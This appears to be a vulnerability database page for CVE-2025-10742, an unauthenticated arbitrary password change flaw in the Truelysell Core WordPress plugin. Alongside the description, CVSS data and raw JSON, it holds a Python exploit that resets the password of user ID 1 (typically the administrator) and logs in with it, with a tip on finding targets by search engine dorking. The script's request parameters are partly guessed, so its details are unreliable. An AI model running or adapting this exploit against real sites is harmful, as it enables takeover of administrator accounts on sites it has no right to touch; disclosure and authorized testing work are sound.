Security Vulnerability Report
中文
CVE-2025-10742 CVSS 9.8 CRITICAL

CVE-2025-10742

Published: 2025-10-16 07:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Truelysell Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.8.6. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited unauthenticated if the attacker knows which page contains the 'truelysell_edit_staff' shortcode.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Truelysell Core <= 1.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10742 PoC - Truelysell Core Arbitrary Password Change # Vulnerability: Unauthenticated Arbitrary User Password Change # Affected: Truelysell Core <= 1.8.6 import requests # Target configuration TARGET_URL = "http://target-wordpress-site.com" # The page containing 'truelysell_edit_staff' shortcode SHORTCODE_PAGE = "/page-with-truelysell-edit-staff/" def exploit_password_change(target_url, shortcode_page, user_id, new_password): """ Exploit the arbitrary password change vulnerability in Truelysell Core plugin. The plugin fails to verify user authorization when processing the 'truelysell_edit_staff' shortcode, allowing unauthenticated password changes. """ endpoint = target_url.rstrip('/') + shortcode_page # Construct the malicious payload # The plugin accepts user-controlled parameters without proper authorization checks payload = { 'truelysell_action': 'edit_staff', 'user_id': str(user_id), 'new_password': new_password, 'confirm_password': new_password, # Additional parameters that may be required by the plugin 'staff_nonce': '', # May be empty or bypassed } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } try: # Send the unauthenticated password change request response = requests.post( endpoint, data=payload, headers=headers, timeout=30, allow_redirects=False ) if response.status_code == 200: print(f"[+] Password change request sent successfully") print(f"[+] Target User ID: {user_id}") print(f"[+] New Password: {new_password}") return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def login_as_admin(target_url, username, password): """Login with the newly set credentials to verify exploitation.""" login_url = target_url.rstrip('/') + '/wp-login.php' session = requests.Session() payload = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/', 'testcookie': '1' } cookies = {'wordpress_test_cookie': 'WP+Cookie+check'} response = session.post(login_url, data=payload, cookies=cookies, allow_redirects=True) if 'wp-admin' in response.url or 'dashboard' in response.text.lower(): print(f"[+] Successfully logged in as {username}!") return True else: print(f"[-] Login failed") return False if __name__ == "__main__": # Step 1: Find page with 'truelysell_edit_staff' shortcode (via Google dork or crawling) # Example: site:target.com inurl:staff # Step 2: Change admin password (user ID 1 is typically the admin) target_user_id = 1 new_password = "PwnedByCVE-2025-10742!" print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Attempting to change password for user ID: {target_user_id}") if exploit_password_change(TARGET_URL, SHORTCODE_PAGE, target_user_id, new_password): # Step 3: Login with new credentials login_as_admin(TARGET_URL, "admin", new_password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10742", "sourceIdentifier": "[email protected]", "published": "2025-10-16T07:15:32.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Truelysell Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.8.6. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited unauthenticated if the attacker knows which page contains the 'truelysell_edit_staff' shortcode."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://themeforest.net/item/truelysell-service-booking-wordpress-theme/43398124", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a636e865-9556-4afb-8726-4537a160f379?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.